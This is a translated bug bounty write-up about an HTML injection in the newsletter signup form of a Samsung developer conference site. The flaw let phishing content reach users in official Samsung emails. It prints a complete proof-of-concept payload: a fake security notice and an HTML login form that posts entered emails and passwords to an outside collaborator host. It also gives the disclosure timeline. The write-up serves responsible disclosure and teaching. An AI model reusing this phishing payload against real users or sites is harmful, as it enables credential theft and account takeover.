前言

前不久，白帽小哥在三星公司的一次渗透测试中发现了一处 HTML 注入漏洞，因此获得了不菲的赏金奖励。现将这一过程中的有关细节分享给各位。

漏洞发现

在对三星网站进行渗透测试时，首先使用了不同的 Google Dorks 进行信息搜集。发现了一处子域名：

https://www.samsungdeveloperconference.com/

在该网站的新闻订阅页面中，用户需要输入名字、姓氏和邮箱地址以订阅新闻。

为了测试 HTML 注入漏洞，在名字和姓氏字段中加入了恶意的 Payload，并成功触发了该漏洞。

在提交订阅后，可以看到输入的 Payload 被成功注入，并通过电子邮件发送给用户，完整的PoC如下（在姓氏中插入恶意 Payload）：

Dear Team

As part of our commitment to security, we have logged you out of your accounts due to recent updates in our system protocols. To ensure the safety and integrity of your account, please re-login using the secure link provided below.

<html>
<body>
<form action="https://burpcolloborator.com">Login again for security:<br><br> 
<label for="u">Email id:
<input type="text" id="u" name="u"><br><br>
<label for="p">Password:
<input type="password" id="p" name="p"><br></br>
<input type="submit" value="Submit">
</body>
</html>

Payload in lastname:
If you encounter any issues or have questions, feel free to reach out to our IT support team at. We appreciate your cooperation in keeping our systems secure.

Thank you for your understanding.

Best Regards,
Samsung Developer
<!--

被插入恶意 Payload 的电子邮件展示如下：

当受害者在收到的邮件中输入邮箱和密码后，攻击者能轻松获取受害者的凭证，从而接管受害者的账户。需要注意的是，电子邮件来源于三星官方地址，这大大提高了欺骗成功的概率。

在发现漏洞后，我立即向三星团队报告。三星的响应速度非常快，并对我的报告进行了确认和奖励。然而，尽管漏洞利用的严重性显而易见，三星团队却将其标记为低严重性（LOW），而我认为至少应该为中等严重性（P3）。

三星的修复措施

三星团队随后采取了以下措施来修复该漏洞：
对输入字符进行了详细的白名单审核，包括'>'、'<', ',"、'%' 等字符。

时间线

2024-11-13：报告漏洞
2024-11-26：确认漏洞有效
2024-12-13：确认修复已部署，并询问更新
2024-12-18：确认修复已部署，标记为低严重性
2025-01-06：确认并决定奖励
2025-01-11：建议重新评估严重性为 P3
2025-01-16：拒绝了重新评估请求
2025-02-17：通过 BUGCROWD 获得赏金奖励

以上内容由骨哥翻译并整理。

原文：https://infosecwriteups.com/htmli-to-ato-leads-to-bounty-9725cb23a67c